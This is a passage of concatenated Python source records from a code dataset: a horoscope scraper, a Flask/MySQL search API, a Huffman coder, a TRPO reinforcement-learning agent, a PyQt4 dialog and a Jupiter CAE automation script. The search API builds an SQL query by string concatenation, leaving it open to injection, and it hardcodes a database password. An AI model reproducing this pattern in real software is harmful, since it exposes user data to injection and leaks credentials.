sign_dict[sign]\n\thtm = Download_Page(fetch_url)\n\tif htm != None:\n\t\tdata = soup(htm, 'lxml')\n\t\ttr = data.find(\"div\",{\"class\":\"main-horoscope\"}).find(\"p\")\n\t\treturn tr\n\telse:\n\t\treturn 0\n\ndef from_Astrology_com(time = \"today\", sign = \"aquarius\"):\n\t''' Pull horoscope from astrology.com'''\n\tbase_url = 'https://www.astrology.com/horoscope/daily'\n\tfetch_url = base_url+ '/' + time + '/' + str(sign) + '.html'\n\thtm = Download_Page(fetch_url)\n\tif htm != None:\n\t\tdata = soup(htm, 'lxml')\n\t\ttr = data.find(\"div\", {\"class\":\"horoscope-main grid grid-right-sidebar primis-rr\"}).find(\"p\")\n\t\treturn tr\n\telse:\n\t\treturn 0\n\ndef from_GaneshaSpeaks(time = \"today\", sign = \"aquarius\"):\n\t''' Pull horoscope from ganeshaspeaks.com'''\n\tbase_url = \"https://www.ganeshaspeaks.com/horoscopes/\"\n\tif time == 'today':\n\t\tfetch_url = base_url + \"daily-horoscope/\" + sign + \"/\"\n\telif time == 'yesterday':\n\t\tfetch_url = base_url + \"yesterday-horoscope/\" + sign + \"/\"\n\telse:\n\t\tfetch_url = base_url + \"tomorrow-horoscope/\" + sign + \"/\"\n\thtm = Download_Page(fetch_url)\n\tif htm != None:\n\t\tdata = soup(htm, 'lxml')\n\t\ttr = data.find(\"div\",{\"class\":\"row card-padding-20 container-fluid-xs margin-bottom-xs-0\"}).find(\"p\",{\"class\":\"margin-top-xs-0\"})\n\t\treturn tr\n\telse:\n\t\treturn 0\ndef cal_date(day):\n\tnow = datetime.now()\n\tif day == \"tomorrow\":\n\t\treturn now + timedelta(days = 1)\n\telif day == \"yesterday\":\n\t\treturn now - timedelta(days = 1)\n\telse:\n\t\treturn now\n\n\ndef main():\n\t'Main function to call the other functions'\n\tparser = argparse.ArgumentParser(description='Display the daily horoscope based on time and sign')\n\tparser.add_argument('-s', '--sign', help='enter the full sun sign', default='aquarius')\n\tparser.add_argument('-d', '--day', help='enter yesterday,today or tommorrow', default='today')\n\targs = parser.parse_args()\n\t#passing the args to horroscope calling functions\n\tprophecy_date = cal_date(args.day)\n\tbejan_info = from_GaneshaSpeaks(args.day, args.sign)\n\tastro_info = from_Astrology_com(args.day, args.sign)\n\thoro_info = from_Horoscope_com(args.day, args.sign)\n\n\tif bejan_info == 0 or astro_info == 0 or horo_info == 0:\n\t\tprint(\"Sorry No horoscope, Kindly check the details provided: %(day)s , %(sign)s\" %{'day':args.day, 'sign':args.sign})\n\telse:\n\t\tprint(\"\\n{}:\\n\".format(str(args.sign).capitalize()))\n\t\tprint(prophecy_date.strftime(\"%b, %d %Y:\\n\"))\n\t\tprint(\"#From ganeshaspeaks.com for {}\\n\".format(args.sign))\n\t\tprint(bejan_info.text.strip(), '\\n')\n\t\tprint(\"#From astrology.com for {}\\n\".format(args.sign))\n\t\tprint(astro_info.text.split(\":\")[1].strip(), '\\n')\n\t\tprint(\"#From horoscope.com for {}\\n\".format(args.sign))\n\t\tprint(horo_info.text.split(\"-\")[1].strip(), '\\n')\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"horoscope.py","file_name":"horoscope.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544108995","text":"import mysql.connector\nfrom flask import jsonify\nimport json\nfrom flask import Flask\nfrom flask import request\n\napplication = Flask(__name__)\n\n\ndef setupConnection():\n conn = mysql.connector.connect(\n user='aramis',\n password='CsGetDegrees648!',\n host='localhost',\n database='CsGetDegrees',\n auth_plugin='mysql_native_password')\n cursor = conn.cursor()\n return conn, cursor\n\n\ndef search(q):\n conn, cursor = setupConnection()\n cursor.execute(\"select * from Product\")\n allproducts = cursor.fetchall()\n jsonArray = []\n for element in allproducts:\n jsonArray.append(json.dumps(\n {'pid': element[0], 'name': element[1], 'price': element[2], 'tags': element[3], 'category': element[4],\n 'description': element[5], 'product_creator': element[6], 'product_buyer': element[7]}))\n return structureIntoValidJson(jsonArray)\n\ndef retrieveProductsByName(productName):\n productTableNameQuery = \"select * from Product where name = \\'\" + productName + \"\\'\"\n conn, cursor = setupConnection()\n cursor.execute(productTableNameQuery)\n productmatches = cursor.fetchall()\n conn.close()\n jsonArray = []\n for element in productmatches:\n jsonArray.append(json.dumps({'pid': element[0], 'name': element[1], 'price': element[2], 'tags': element[3], 'category': element[4], 'description': element[5], 'product_creator': element[6], 'product_buyer': element[7]}))\n return structureIntoValidJson(jsonArray)\n\ndef structureIntoValidJson(jsonArray):\n jsonStructure = \"{\\n\\\"data\\\": [\"\n for i in jsonArray:\n jsonStructure = jsonStructure + \"\\n\"\n jsonStructure = jsonStructure + i + \", \"\n jsonStructure = jsonStructure[:-2]\n jsonStructure = jsonStructure + \"\\n]\\n}\"\n return jsonStructure\n","sub_path":"application/back-end/myproject/searchAPI.py","file_name":"searchAPI.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"522055196","text":"# checker:\n# https://practice.geeksforgeeks.org/problems/huffman-encoding/0\n# docs:\n# https://www.geeksforgeeks.org/efficient-huffman-coding-for-sorted-input-greedy-algo-4/\n\nfrom collections import deque\n\n\"\"\"\nfor test\n\n1\nabcdef\n5 9 12 13 16 45\n\n\"\"\"\n\n\nclass HuffmanCodeItem:\n\n def __init__(self, letter, freq, left=None, right=None):\n self.letter = letter\n self.freq = freq\n self.left = left\n self.right = right\n\n\nclass HuffmanCode:\n\n def __init__(self, letters, frequencies):\n self.queue_1 = deque()\n self.queue_2 = deque()\n for i in range(len(letters)):\n self.queue_1.append(HuffmanCodeItem(letters[i], frequencies[i]))\n\n # building huffman tree\n # we need first condition for first iteration case where we take 2 elements\n # from q1, merge them and push into q2\n while len(self.queue_1) != 0 or len(self.queue_2) != 1:\n left = self.find_min_and_pop()\n right = self.find_min_and_pop()\n\n self.queue_2.append(HuffmanCodeItem('$', left.freq + right.freq, left, right))\n\n def find_min_and_pop(self):\n if not self.queue_1:\n return self.queue_2.popleft()\n\n if not self.queue_2:\n return self.queue_1.popleft()\n\n if self.queue_1[0].freq <= self.queue_2[0].freq:\n return self.queue_1.popleft()\n return self.queue_2.popleft()\n\n def print_ans_aux(self, item, str_collector):\n if item is None:\n return\n\n if item.letter != '$':\n print(str_collector, end=' ')\n\n self.print_ans_aux(item.left, str_collector + '0')\n self.print_ans_aux(item.right, str_collector + '1')\n\n def print_ans(self):\n ans = self.queue_2.popleft()\n self.print_ans_aux(ans, '')\n\n\nif __name__ == '__main__':\n\n t = int(input())\n for _ in range(t):\n l = list(input())\n f = list(map(int, input().split()))\n coded = HuffmanCode(l, f)\n coded.print_ans()\n","sub_path":"code/themes/greedy/huffman_encoding/python/n.py","file_name":"n.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"430099482","text":"from utils import *\nimport numpy as np\nimport random\nimport tensorflow as tf\nimport time\nimport os\nimport logging\nfrom gym import envs, scoreboard\nimport tempfile\nimport sys\nfrom collections import namedtuple\n\n\ntiny = 1e-10\n\n\ndef create_config():\n MyConfig = namedtuple('MyConfig', ['timesteps_per_batch', 'max_pathlength', 'max_kl', 'cg_damping', 'gamma'])\n config = MyConfig(timesteps_per_batch=6000,\n max_pathlength=200,\n max_kl=0.01,\n cg_damping=0.1,\n gamma=0.99)\n return config\n\n\ndef normal_log_prob(x, mean, log_std, dim):\n \"\"\"\n x: [batch, dim]\n return: [batch]\n \"\"\"\n zs = (x - mean) / tf.exp(log_std)\n return - tf.reduce_sum(log_std, axis=1) - \\\n 0.5 * tf.reduce_sum(tf.square(zs), axis=1) - \\\n 0.5 * dim * np.log(2 * np.pi)\n\n\ndef normal_kl(old_mean, old_log_std, new_mean, new_log_std):\n \"\"\"\n mean, log_std: [batch, dim]\n return: [batch]\n \"\"\"\n old_std = tf.exp(old_log_std)\n new_std = tf.exp(new_log_std)\n numerator = tf.square(old_mean - new_mean) + \\\n tf.square(old_std) - tf.square(new_std)\n denominator = 2 * tf.square(new_std) + tiny\n return tf.reduce_sum(\n numerator / denominator + new_log_std - old_log_std, axis=1)\n\n\ndef normal_entropy(log_std):\n return tf.reduce_sum(log_std + np.log(np.sqrt(2 * np.pi * np.e)), axis=1)\n\n\nclass TRPOAgent(object):\n def __init__(self, env):\n self.config = create_config()\n self.env = env\n\n print(\"Observation Space\", env.observation_space)\n print(\"Action Space\", env.action_space)\n\n self.obs_dim = obs_dim = env.observation_space.shape[0]\n self.act_dim = act_dim = env.action_space.shape[0]\n\n self.session = tf.Session()\n self.end_count = 0\n self.train = True\n\n # obs = [ current obs, previous obs, previous action ]\n self.obs = obs = tf.placeholder(tf.float32, shape=[None, obs_dim], name=\"obs\")\n self.prev_obs = np.zeros((1, obs_dim), dtype=np.float32)\n self.prev_action = np.zeros((1, act_dim), dtype=np.float32)\n self.action = action = tf.placeholder(tf.float32, shape=[None, act_dim], name=\"action\")\n self.advant = advant = tf.placeholder(tf.float32, shape=[None], name=\"advant\")\n\n self.oldact_mean = oldact_mean = tf.placeholder(tf.float32, shape=[None, act_dim], name=\"oldaction_mean\")\n self.oldact_logstd = oldact_logstd = tf.placeholder(tf.float32, shape=[None, act_dim], name=\"oldaction_logstd\")\n\n # Create neural network.\n layer_h1 = tf.nn.relu(dense(obs, 32, 'hidden1', 1.0))\n layer_h2 = tf.nn.relu(dense(layer_h1, 8, 'hidden2', 1.0))\n self.act_mean = act_mean = dense(layer_h2, act_dim, 'action_mean', 0.1)\n self.act_logstd = act_logstd = dense(layer_h2, act_dim, 'action_logstd', 0.1)\n\n # sample action\n sampled_eps = tf.random_normal(tf.shape(act_mean))\n self.sampled_action = sampled_action = sampled_eps * tf.exp(act_logstd) + act_mean\n\n # compute KL, log_prob, entropy\n N = tf.shape(obs)[0]\n p_n = normal_log_prob(action, act_mean, act_logstd, act_dim)\n oldp_n = normal_log_prob(action, oldact_mean, oldact_logstd, act_dim)\n ratio_n = tf.exp(p_n - oldp_n)\n surr = -tf.reduce_mean(ratio_n * advant) # Surrogate loss\n var_list = tf.trainable_variables()\n kl = tf.reduce_mean(normal_kl(oldact_mean, oldact_logstd, act_mean, act_logstd))\n ent = tf.reduce_mean(normal_entropy(act_logstd))\n\n self.losses = [surr, kl, ent]\n self.pg = flatgrad(surr, var_list)\n\n # KL divergence where first arg is fixed\n # replace old->tf.stop_gradient from previous kl\n kl_firstfixed = tf.reduce_mean(normal_kl(tf.stop_gradient(act_mean),\n tf.stop_gradient(act_logstd),\n act_mean, act_logstd))\n grads = tf.gradients(kl_firstfixed, var_list)\n self.flat_tangent = tf.placeholder(tf.float32, shape=[None])\n shapes = map(var_shape, var_list)\n start = 0\n tangents = []\n for shape in shapes:\n size = np.prod(shape)\n param = tf.reshape(self.flat_tangent[start:(start + size)], shape)\n tangents.append(param)\n start += size\n gvp = [tf.reduce_sum(g * t) for (g, t) in zip(grads, tangents)]\n self.fvp = flatgrad(gvp, var_list)\n self.gf = GetFlat(self.session, var_list)\n self.sff = SetFromFlat(self.session, var_list)\n self.vf = VF(self.session)\n self.session.run(tf.initialize_all_variables())\n\n def act(self, obs, *args):\n if len(obs.shape) > 1:\n obs = np.squeeze(obs)\n obs = np.expand_dims(obs, 0)\n obs_new = obs #np.concatenate([obs, self.prev_obs, self.prev_action], 1)\n\n self.prev_obs = obs\n\n action, mean, logstd = self.session.run([self.sampled_action, self.act_mean, self.act_logstd], {self.obs: obs_new})\n self.prev_action = action\n action = action[0]\n return action, mean, logstd, np.squeeze(obs_new)\n\n def learn(self, max_iters = 1000, animate = True):\n config = self.config\n start_time = time.time()\n numeptotal = 0\n for i in range(max_iters):\n print(\"\\n********** Iteration %i ************\" % i)\n # Generating paths.\n print(\"Rollout\")\n paths = rollout(\n self.env,\n self,\n config.max_pathlength,\n config.timesteps_per_batch,\n animate=(animate and i % 10 == 0))\n\n # Computing returns and estimating advantage function.\n for path in paths:\n path[\"baseline\"] = self.vf.predict(path)\n path[\"returns\"] = discount(path[\"rewards\"], config.gamma)\n path[\"advant\"] = path[\"returns\"] - path[\"baseline\"]\n\n # Updating policy.\n action_mean_n = np.concatenate([path[\"action_means\"] for path in paths])\n action_logstd_n = np.concatenate([path[\"action_logstds\"] for path in paths])\n obs_n = np.concatenate([path[\"obs\"] for path in paths])\n action_n = np.concatenate([path[\"actions\"] for path in paths])\n baseline_n = np.concatenate([path[\"baseline\"] for path in paths])\n returns_n = np.concatenate([path[\"returns\"] for path in paths])\n\n # Standardize the advantage function to have mean=0 and std=1.\n advant_n = np.concatenate([path[\"advant\"] for path in paths])\n advant_n -= advant_n.mean()\n advant_n /= (advant_n.std() + tiny)\n \n feed = {self.obs: obs_n,\n self.action: action_n,\n self.advant: advant_n,\n self.oldact_mean: action_mean_n,\n self.oldact_logstd: action_logstd_n}\n\n\n episoderewards = np.array([path[\"rewards\"].sum() for path in paths])\n\n if not self.train:\n print(\"Episode mean: %f\" % episoderewards.mean())\n self.end_count += 1\n if self.end_count > 100:\n break\n if self.train:\n # Computing baseline function for next iter.\n self.vf.fit(paths)\n thprev = self.gf()\n\n def fisher_vector_product(p):\n feed[self.flat_tangent] = p\n return self.session.run(self.fvp, feed) + config.cg_damping * p\n\n g = self.session.run(self.pg, feed_dict=feed)\n stepdir = conjugate_gradient(fisher_vector_product, -g)\n shs = .5 * stepdir.dot(fisher_vector_product(stepdir))\n lm = np.sqrt(shs / config.max_kl)\n fullstep = stepdir / lm\n neggdotstepdir = -g.dot(stepdir)\n\n def loss(th):\n self.sff(th)\n return self.session.run(self.losses[0], feed_dict=feed)\n theta = linesearch(loss, thprev, fullstep, neggdotstepdir / lm)\n self.sff(theta)\n\n surrafter, kloldnew, entropy = self.session.run(\n self.losses, feed_dict=feed)\n if kloldnew > 2.0 * config.max_kl:\n self.sff(thprev)\n\n stats = {}\n\n numeptotal += len(episoderewards)\n items = [\"Total number of episodes\", \"Average sum of rewards per episode\",\n \"Entropy\",\"Baseline explained\", \"KL between old and new distribution\",\n \"Surrogate loss\", \"Time elapsed\"]\n stats[items[0]] = numeptotal\n stats[items[1]] = episoderewards.mean()\n stats[items[2]] = entropy\n exp = explained_variance(np.array(baseline_n), np.array(returns_n))\n stats[items[3]] = exp\n stats[items[4]] = kloldnew\n stats[items[5]] = surrafter\n stats[items[6]] = \"%.2f mins\" % ((time.time() - start_time) / 60.0)\n for k in items:\n v = stats[k]\n print(k + \": \" + \" \" * (40 - len(k)) + str(v))\n if entropy != entropy:\n exit(-1)\n #if exp > 0.8:\n # self.train = False\n\ntf.reset_default_graph()\ntraining_dir = tempfile.mkdtemp()\nlogging.getLogger().setLevel(logging.DEBUG)\n\nif len(sys.argv) > 1:\n task = sys.argv[1]\nelse:\n #task = \"RepeatCopy-v0\"\n task = \"Pendulum-v0\"\n\nhdlr = logging.FileHandler('./log/'+task)\nlogging.getLogger().addHandler(hdlr)\n\nenv = envs.make(task)\n#env.monitor.start(training_dir)\n\n#env = SpaceConversionEnv(env, Box, Discrete)\n\nagent = TRPOAgent(env)\nagent.learn(10000, False)\n#env.monitor.close()\n#gym.upload(training_dir,\n# algorithm_id='trpo_ff')\n\n\n","sub_path":"trpo/trpo_main.py","file_name":"trpo_main.py","file_ext":"py","file_size_in_byte":9978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"352986502","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 6 13:10:01 2015\r\n\r\n@author: User\r\n\"\"\"\r\nimport logging\r\nfrom PyQt4 import QtGui, uic\r\nimport app.general.pomocne_funkcije as pomocne_funkcije\r\n\r\n\r\nbase9, form9 = uic.loadUiType('./app/view/ui_files/opcije_pomocnih.ui')\r\nclass OpcijePomocnog(base9, form9):\r\n \"\"\"\r\n Klasa je dijalog preko kojeg se bira i odredjuju postavke pomocnog\r\n grafa.\r\n \"\"\"\r\n def __init__(self, parent=None, default=None, stablo=None, copcije=None, mapa=None):\r\n logging.debug('Iniicjalizacija OpcijePomocnog, start')\r\n \"\"\"\r\n inicijalizacija sa :\r\n -*listom defaultnih postavki za graf (postojeci izbor ili neki default)\r\n -stablo, instanca modela programa mjerenja (izbor stanice/kanala/usporedno)\r\n -copcije - lista combobox opcija [[markeri], [linije]]\r\n -opisna mapa (nested), {programMjerenjaId:{stanica, kanal, usporedno....}}\r\n\r\n *lista sadrzi redom elemente:\r\n [kanal id, postaja, komponenta, usporedno, marker, markersize, line,\r\n linewidth, rgb tuple, alpha, zorder, label]\r\n \"\"\"\r\n super(base9, self).__init__(parent)\r\n self.setupUi(self)\r\n self.markeri = copcije[0] # popis svih stilova markera\r\n msg = 'self.markeri = {0}'.format(str(self.markeri))\r\n logging.debug(msg)\r\n self.linije = copcije[1] # popis svih stilova linije\r\n msg = 'self.linije = {0}'.format(str(self.linije))\r\n logging.debug(msg)\r\n if mapa == None:\r\n self.transformMapa = {};\r\n else:\r\n self.transformMapa = mapa # nested dict, programMjerenjaId:info o tom mjerenju\r\n msg = 'self.transformMapa = {0}'.format(str(self.transformMapa))\r\n logging.debug(msg)\r\n # provjeri da li je default zadan, spremi default u privatni member\r\n if default == None:\r\n #definiraj defaultnu vrijednost\r\n self.defaultGraf = [None,\r\n None,\r\n None,\r\n None,\r\n 'Bez markera',\r\n 12,\r\n 'Puna linija',\r\n 1.0,\r\n (0, 0, 255),\r\n 1.0,\r\n 5,\r\n '']\r\n else:\r\n self.defaultGraf = default\r\n msg = 'self.defaultGraf = {0}'.format(str(self.defaultGraf))\r\n logging.debug(msg)\r\n #spremi stablo u privatni member\r\n self.stablo = stablo\r\n msg = 'self.stablo = {0}'.format(repr(self.stablo))\r\n logging.debug(msg)\r\n self.inicijaliziraj()\r\n self.veze()\r\n\r\n def vrati_default_graf(self):\r\n \"\"\"\r\n funkcija vraca member self.defaultGraf u kojemu su trenutne postavke\r\n pomocnog grafa\r\n \"\"\"\r\n msg = 'returning postavke pomocnog grafa, postavke={0}'.format(str(self.defaultGraf))\r\n logging.debug(msg)\r\n return self.defaultGraf\r\n\r\n def inicijaliziraj(self):\r\n \"\"\"\r\n Inicijaliztacija dijaloga.\r\n Postavljanje defaultnih vrijednosti u comboboxeve, spinboxeve...\r\n \"\"\"\r\n # postavi model programa mjerenja u qtreeview\r\n self.treeView.setModel(self.stablo)\r\n #marker combo\r\n self.comboMarkerStil.clear()\r\n self.comboMarkerStil.addItems(self.markeri)\r\n self.comboMarkerStil.setCurrentIndex(self.comboMarkerStil.findText(self.defaultGraf[4]))\r\n #marker size\r\n self.spinMarker.setValue(self.defaultGraf[5])\r\n #linija combo\r\n self.comboLineStil.clear()\r\n self.comboLineStil.addItems(self.linije)\r\n self.comboLineStil.setCurrentIndex(self.comboLineStil.findText(self.defaultGraf[6]))\r\n #linija width\r\n self.doubleSpinLine.setValue(self.defaultGraf[7])\r\n #alpha vrijednost boje\r\n self.alphaBoja.setValue(self.defaultGraf[9])\r\n #boja, stil gumba\r\n rgb = self.defaultGraf[8]\r\n a = self.defaultGraf[9]\r\n self.set_widget_color_style(rgb, a, \"QPushButton\", self.bojaButton)\r\n #label\r\n self.lineEditLabel.clear()\r\n postaja = str(self.defaultGraf[1])\r\n komponenta = str(self.defaultGraf[2])\r\n usporedno = str(self.defaultGraf[3])\r\n nazivGrafa = postaja + ':' + komponenta + ':' + usporedno\r\n self.lineEditLabel.setText(nazivGrafa)\r\n self.defaultGraf[11] = nazivGrafa\r\n #pokusaj izabrati isti element u stablu (ako je element izabran)\r\n if self.defaultGraf[0] is not None:\r\n self.postavi_novi_glavni_kanal(self.defaultGraf[0])\r\n\r\n def veze(self):\r\n \"\"\"\r\n povezivanje signala koji se emitiraju prilikom interakcije sa widgetima\r\n sa funkcijama koje mjenjaju stanje grafa.\r\n \"\"\"\r\n self.lineEditLabel.textChanged.connect(self.promjeni_label)\r\n self.comboMarkerStil.currentIndexChanged.connect(self.promjeni_marker_stil)\r\n self.spinMarker.valueChanged.connect(self.promjeni_marker_size)\r\n self.comboLineStil.currentIndexChanged.connect(self.promjeni_line_stil)\r\n self.doubleSpinLine.valueChanged.connect(self.promjeni_line_width)\r\n self.bojaButton.clicked.connect(self.promjeni_boju)\r\n self.treeView.clicked.connect(self.promjeni_izbor_stabla)\r\n self.alphaBoja.valueChanged.connect(self.promjeni_alpha)\r\n\r\n def promjeni_alpha(self, x):\r\n \"\"\"\r\n promjena prozirnosti boje pomocnog kanala.\r\n \"\"\"\r\n msg = 'zahtjev za promjenom prozirnosti pomocnog kanala, alpha={0}'.format(str(x))\r\n logging.debug(msg)\r\n value = round(float(x), 2)\r\n # postavi novu vrijednost\r\n self.defaultGraf[9] = value\r\n logging.debug('vrijednost postavljena')\r\n #update boju gumba\r\n rgb = self.defaultGraf[8]\r\n logging.debug('update boje widgeta, prikaz izabrane postavke')\r\n self.set_widget_color_style(rgb,\r\n value,\r\n \"QPushButton\",\r\n self.bojaButton)\r\n\r\n def pronadji_index_od_kanala(self, kanal):\r\n \"\"\"\r\n Za zadani kanal (mjerenjeId) pronadji odgovarajuci QModelIndex u\r\n stablu.\r\n ulaz je trazeni kanal, izlaz je QModelIndex\r\n \"\"\"\r\n msg = 'pronadji_index_od_kanala, start. kanal={0}'.format(str(kanal))\r\n logging.debug(msg)\r\n # \"proseci\" stablom u potrazi za indeksom\r\n for i in range(self.stablo.rowCount()):\r\n ind = self.stablo.index(i, 0) #index stanice, (parent)\r\n otac = self.stablo.getItem(ind)\r\n for j in range(otac.childCount()):\r\n ind2 = self.stablo.index(j, 0, parent=ind) #indeks djeteta\r\n komponenta = self.stablo.getItem(ind2)\r\n #provjera da li kanal u modelu odgovara zadanom kanalu\r\n if int(komponenta._data[2]) == kanal:\r\n msg = 'pronadji_index_od_kanala, kraj. kanal={0} , index={1}'.format(str(kanal), str(ind2))\r\n logging.debug(msg)\r\n return ind2\r\n msg = 'pronadji_index_od_kanala, kraj. kanal={0} , index nije pronadjen. return None.'.format(str(kanal))\r\n logging.debug(msg)\r\n return None\r\n\r\n def postavi_novi_glavni_kanal(self, kanal):\r\n \"\"\"\r\n Metoda postavlja zadani kanal kao selektirani u treeView.\r\n Koristi se tijekom inicijalizacije\r\n \"\"\"\r\n msg = 'postavi_novi_glavni_kanal, start. kanal={0}'.format(str(kanal))\r\n logging.debug(msg)\r\n noviIndex = self.pronadji_index_od_kanala(kanal)\r\n if noviIndex is not None:\r\n # postavi novi indeks\r\n self.treeView.setCurrentIndex(noviIndex)\r\n #javi za promjenu izbora stabla\r\n self.promjeni_izbor_stabla(True)\r\n logging.debug('postavi_novi_glavni_kanal, kraj.')\r\n else:\r\n logging.debug('postavi_novi_glavni_kanal, kraj. Indeks nije pronadjen za zadani kanal.')\r\n\r\n def promjeni_izbor_stabla(self, x):\r\n \"\"\"\r\n promjena/izbor programa mjerenja sa stabla (Postaja/Kanal/Usporedno)\r\n \"\"\"\r\n logging.debug('promjeni_izbor_stabla, start.')\r\n ind = self.treeView.currentIndex() # dohvati trenutni aktivni indeks\r\n item = self.stablo.getItem(ind) # dohvati specificni objekt pod tim indeksom\r\n prog = item._data[2] # dohvati program mjerenja iz liste podataka\r\n msg = 'izabrani program mjerenja, id={0}'.format(str(prog))\r\n logging.debug(msg)\r\n #Ako netko izabere stanicu u stablu, prog == None\r\n #Ako netko izabere komponentu u stablu, prog == programMjerenjaId\r\n #nastavi samo ako je izabrana komponenta!\r\n if prog is not None:\r\n prog = int(prog)\r\n # uz pomoc mape self.transformMapa dohvati postaju/komponentu/usporedno\r\n postaja = str(self.transformMapa[prog]['postajaNaziv'])\r\n komponenta = str(self.transformMapa[prog]['komponentaNaziv'])\r\n usporedno = str(self.transformMapa[prog]['usporednoMjerenje'])\r\n #promjeni self.defaultGraf ciljane vrijednosti\r\n self.defaultGraf[0] = prog\r\n self.defaultGraf[1] = postaja\r\n self.defaultGraf[2] = komponenta\r\n self.defaultGraf[3] = usporedno\r\n #promjeni label da odgovara izboru\r\n tekst = postaja + ':' + komponenta + ':' + usporedno\r\n self.lineEditLabel.clear()\r\n self.lineEditLabel.setText(tekst)\r\n logging.debug('promjeni_izbor_stabla, kraj.')\r\n else:\r\n logging.debug('promjeni_izbor_stabla, kraj. Program mjerenja id je None. Izabrana je stanica.')\r\n\r\n def promjeni_label(self, tekst):\r\n \"\"\"\r\n promjeni/zamapti promjenu labela\r\n \"\"\"\r\n msg = 'Zahtjev za promjenom labela grafa. novi label={0}'.format(str(tekst))\r\n logging.debug(msg)\r\n self.defaultGraf[11] = str(tekst)\r\n\r\n def promjeni_marker_stil(self):\r\n \"\"\"\r\n promjeni/zapamti promjenu stila makrera\r\n \"\"\"\r\n marker = self.comboMarkerStil.currentText()\r\n msg = 'Zahtjev za promjenom stila markera. novi stil={0}'.format(str(marker))\r\n logging.debug(msg)\r\n self.defaultGraf[4] = marker\r\n\r\n def promjeni_line_stil(self):\r\n \"\"\"\r\n promjeni/zapamti promjenu stila linije\r\n \"\"\"\r\n line = self.comboLineStil.currentText()\r\n msg = 'Zahtjev za promjenom stila linije. novi stil={0}'.format(str(line))\r\n logging.debug(msg)\r\n self.defaultGraf[6] = line\r\n\r\n def promjeni_marker_size(self):\r\n \"\"\"\r\n promjeni/zapamti promjenu velicine markera\r\n \"\"\"\r\n velicina = self.spinMarker.value()\r\n msg = 'Zahtjev za promjenom velicine markera. novi size={0}'.format(str(velicina))\r\n logging.debug(msg)\r\n self.defaultGraf[5] = velicina\r\n\r\n def promjeni_line_width(self):\r\n \"\"\"\r\n promjeni/zapamti promjenu sirine linije\r\n \"\"\"\r\n sirina = self.doubleSpinLine.value()\r\n msg = 'Zahtjev za promjenom sirine linije. nova sirina={0}'.format(str(sirina))\r\n logging.debug(msg)\r\n self.defaultGraf[7] = sirina\r\n\r\n def promjeni_boju(self):\r\n \"\"\"\r\n promjeni/zapamti promjenu boje grafa\r\n \"\"\"\r\n logging.debug('Zahtjev za promjenom boje')\r\n # defaultni izbor\r\n rgb = self.defaultGraf[8]\r\n a = self.defaultGraf[9]\r\n #convert u QColor\r\n boja = pomocne_funkcije.default_color_to_qcolor(rgb, a)\r\n #poziv dijaloga za promjenu boje\r\n color, test = QtGui.QColorDialog.getRgba(boja.rgba(), self)\r\n if test: #test == True ako je boja ispravno definirana\r\n color = QtGui.QColor.fromRgba(color) #bitni adapter izlaza dijaloga\r\n rgb, a = pomocne_funkcije.qcolor_to_default_color(color)\r\n msg = 'nova boja rgb={0}, alpha={1}'.format(str(rgb), str(a))\r\n logging.debug(msg)\r\n #zapamti novu boju\r\n self.defaultGraf[8] = rgb\r\n self.defaultGraf[9] = a\r\n #set novu alpha vrijednost u odgovarajuci QDoubleSpinBox\r\n self.alphaBoja.setValue(a)\r\n #promjeni boju gumba\r\n logging.debug('update boje widgeta, prikaz izabrane postavke')\r\n self.set_widget_color_style(rgb,\r\n a,\r\n \"QPushButton\",\r\n self.bojaButton)\r\n else:\r\n logging.debug('izabrana boja nije validna.')\r\n\r\n def set_widget_color_style(self, rgb, a, tip, target):\r\n \"\"\"\r\n izrada stila widgeta\r\n tip - qwidget tip, npr \"QPushButton\"\r\n target - instanca widgeta kojem mjenjamo stil\r\n \"\"\"\r\n # get string name of target object\r\n name = str(target.objectName())\r\n #napravi stil\r\n stil = pomocne_funkcije.rgba_to_style_string(rgb, a, tip, name)\r\n #set stil u target\r\n target.setStyleSheet(stil)\r\n","sub_path":"view/dodavanje_pomocnih.py","file_name":"dodavanje_pomocnih.py","file_ext":"py","file_size_in_byte":13238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"605381657","text":"import os, subprocess\nimport threading\nimport time\nfrom jupiterutils import *\nimport logging\nimport psutil\n\nlogging.basicConfig(level=logging.DEBUG,\n format='(%(threadName)-9s) %(message)s',)\n\ndef CheckProcessDCAD(procName):\n for proc in psutil.process_iter():\n if proc.name() == procName:\n return True\n return False\n\ndef open_Jupiter(e, t):\n path = r\"C:\\Program Files\\TechnoStar\\Jupiter-Pre_5.0\\Start_It.bat\"\n # os.chdir(path)\n # os.system(\"Start_It.bat\")\n subprocess.run(path, shell=True)\n\n isDCADOpen = False\n while isDCADOpen == False:\n isDCADOpen = CheckProcessDCAD('DCAD_main.exe')\n logging.debug('Is Jupiter running now? %s', isDCADOpen)\n \n wait_time = 20\n logging.debug('Wait for %s seconds', wait_time)\n time.sleep(wait_time)\n logging.debug('$%s seconds passed', wait_time)\n e.set()\n logging.debug('Event set: %s', e.isSet())\n e.clear()\n\n while not e.isSet():\n event_is_set = e.wait(t)\n logging.debug('event set: %s', event_is_set)\n if event_is_set:\n logging.debug('Quitting Jupiter')\n JPT.QuitApplication()\n else:\n logging.debug('doing other things')\n \n\ndef create_Cube(e):\n e.wait()\n logging.debug('Using Jupiter')\n logging.debug('Create Cube')\n Geometry.Part.Cube()\n logging.debug('Fit Model')\n JPT.ViewFitToModel()\n JPT.ClearLog()\n e.set()\n \ne = threading.Event()\nt1 = threading.Thread(name='open_Jupiter', target=open_Jupiter, args=(e, 2)) \nt2 = threading.Thread(name='create_Cube', target=create_Cube, args=(e,)) \nt1.start()\nt2.start()\n\ni = 0\nwhile True:\n time.sleep(1)\n i += 1\n logging.debug('Hello! %s times', i)","sub_path":"src/python/testPSJ.py","file_name":"testPSJ.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"536729060","text":"\"\"\"\nModule authors:\nRomanov Andrey, 